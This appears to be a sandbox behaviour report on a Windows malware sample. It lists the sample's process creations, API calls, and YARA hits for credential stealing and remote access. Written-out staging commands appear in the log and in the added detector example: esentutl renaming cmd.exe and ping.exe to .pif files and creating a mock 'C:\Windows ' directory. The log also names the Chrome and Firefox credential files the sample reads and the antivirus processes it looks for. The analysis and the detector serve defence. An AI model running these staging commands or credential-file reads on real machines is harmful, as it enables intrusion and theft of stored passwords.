Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_03212132
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 21_2_02E92132
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_03219662 mouse_event, 11_2_03219662
Source: C:\Users\user\Desktop\nft438A5fN.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe Jump to behavior
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
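The esentutl / alpha.pif / xpha.pif chain above is the loader's staging: esentutl /y copies cmd.exe and ping.exe to .pif names under C:\Users\Public, the renamed cmd.exe creates "C:\Windows " (trailing space) through the \\?\ prefix, which turns off the Win32 path normalisation that would otherwise strip the space, the renamed ping.exe is run against 127.0.0.1 as a delay, and the mock directory is removed afterwards. The detector below is an added example written for this page, not code from the sandbox or from the malware. It runs over constructed process-creation records modelled on the lines above (the ProcessEvent type, its field names, the two benign records and the category labels are this example's own assumptions) and flags each of those four behaviours.

```python
import ntpath  # parses Windows paths correctly on any host OS
import re
from dataclasses import dataclass


# Constructed process-creation records modelled on the sandbox's
# "Process created" lines. Field names are this example's own.
@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


EVENTS = [
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\esentutl.exe",
                 r"C:\Windows\System32\esentutl /y C:\Windows\System32\cmd.exe /d C:\Users\Public\alpha.pif /o"),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\esentutl.exe",
                 r"C:\Windows\System32\esentutl /y C:\Windows\System32\ping.exe /d C:\Users\Public\xpha.pif /o"),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
                 r'C:\Users\Public\alpha.pif /c mkdir "\\?\C:\Windows "'),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
                 r'C:\Users\Public\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"'),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
                 r"C:\Users\Public\alpha.pif /c C:\Users\Public\xpha.pif 127.0.0.1 -n 10"),
    ProcessEvent(r"C:\Users\Public\alpha.pif", r"C:\Users\Public\xpha.pif",
                 r"C:\Users\Public\xpha.pif 127.0.0.1 -n 10"),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
                 r'C:\Users\Public\alpha.pif /c rmdir "C:\Windows \SysWOW64"'),
    ProcessEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Users\Public\alpha.pif",
                 r'C:\Users\Public\alpha.pif /c rmdir "C:\Windows \"'),
    # Two constructed benign records: the rules must stay quiet on these.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c mkdir "C:\Users\Public\build"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ping.exe",
                 r"ping 127.0.0.1 -n 2"),
]

WINDOWS_DIRS = (r"c:\windows\system32" + "\\", r"c:\windows\syswow64" + "\\")
ODD_EXE_EXTS = {".pif", ".com", ".scr"}  # run as PE files despite the extension
ESENTUTL_COPY = re.compile(r"esentutl(?:\.exe)?\s+/y\s+(?P<src>\S+)\s+/d\s+(?P<dst>\S+)", re.I)
LOCALHOST_PING = re.compile(r"^\S+\s+127\.0\.0\.1\s+-n\s+\d+", re.I)  # ping args follow the image
QUOTED_ARG = re.compile(r'"([^"]*)"')
LONG_PATH_PREFIX = "\\\\?\\"  # the \\?\ prefix that disables Win32 path normalisation


def flag_lolbin_copy(ev):
    # esentutl /y <Windows binary> /d <dest>: a system binary copied under a new extension.
    m = ESENTUTL_COPY.search(ev.command_line)
    if not m:
        return []
    src, dst = m.group("src"), m.group("dst")
    if not src.lower().startswith(WINDOWS_DIRS):
        return []
    if ntpath.splitext(src)[1].lower() == ntpath.splitext(dst)[1].lower():
        return []
    return [("lolbin_copy", ntpath.basename(ev.image), f"{ntpath.basename(src)} copied to {dst}")]


def flag_trailing_space_paths(ev):
    # A quoted path component ending in a space or dot. Normal Win32 path handling
    # strips those, so the directory can only be created via \\?\ and later
    # resolves as a look-alike of the real C:\Windows.
    findings = []
    for arg in QUOTED_ARG.findall(ev.command_line):
        path = arg[len(LONG_PATH_PREFIX):] if arg.startswith(LONG_PATH_PREFIX) else arg
        for component in path.split("\\"):
            if component and component != component.rstrip(" ."):
                findings.append(("trailing_space_path", ntpath.basename(ev.image),
                                 f"component {component!r} in {arg!r}"))
    return findings


def flag_renamed_binary_execution(ev):
    # An image with a .pif/.com/.scr extension, and a localhost ping issued by
    # anything that is not ping.exe (a renamed ping used as a sleep).
    findings = []
    name = ntpath.basename(ev.image)
    ext = ntpath.splitext(name)[1].lower()
    if ext in ODD_EXE_EXTS:
        findings.append(("odd_extension", name, f"executable with {ext} extension: {ev.image}"))
    if name.lower() != "ping.exe" and LOCALHOST_PING.search(ev.command_line):
        findings.append(("renamed_ping", name, "localhost ping from a non-ping image (delay loop)"))
    return findings


def analyse(events):
    # Returns (category, image basename, detail) tuples, one per finding.
    findings = []
    for ev in events:
        findings += flag_lolbin_copy(ev)
        findings += flag_trailing_space_paths(ev)
        findings += flag_renamed_binary_execution(ev)
    return findings


if __name__ == "__main__":
    for category, image, detail in analyse(EVENTS):
        print(f"{category:20} {image:14} {detail}")
```

The trailing-space rule deliberately inspects quoted arguments rather than the created directory's name, because telemetry that has already passed through normal path handling will have lost the space; the command line is where it survives. The esentutl rule keys on a changed extension rather than on the .pif name alone, so a copy of cmd.exe to any other name still fires.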
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02D4C246 cpuid 0_2_02D4C246
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C95ACC
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetLocaleInfoA, 0_2_02C9A7C4
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: GetLocaleInfoA, 0_2_02C9A810
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02C95BD8
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00048572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 7_2_00046854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_03252393
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 11_2_03252143
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_0325201B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_032520B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 11_2_03252690
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_032525C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 11_2_032524BC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_03248484
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 11_2_0320F90C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 11_2_0324896D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 11_2_03251FD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 11_2_03251D58
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 15_2_00048572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 15_2_00046854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 15_2_00049310
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02ED2393
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED20B6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED201B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 21_2_02ED2143
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 21_2_02ED2690
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 21_2_02ED24BC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02EC8484
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02ED25C3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoW, 21_2_02EC896D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: GetLocaleInfoA, 21_2_02E8F90C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: EnumSystemLocalesW, 21_2_02ED1FD0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 21_2_02ED1D58
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9920C GetLocalTime, 0_2_02C9920C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321B69E GetUserNameW, 11_2_0321B69E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_032493E5 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 11_2_032493E5
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C9B78C GetVersionExA, 0_2_02C9B78C
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 11_2_0320BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 21_2_02E8BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: \key3.db 21_2_02E8BB6B

Remote Access Functionality

Source: Yara match File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 11_2_0320569A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: cmd.exe 21_2_02E8569A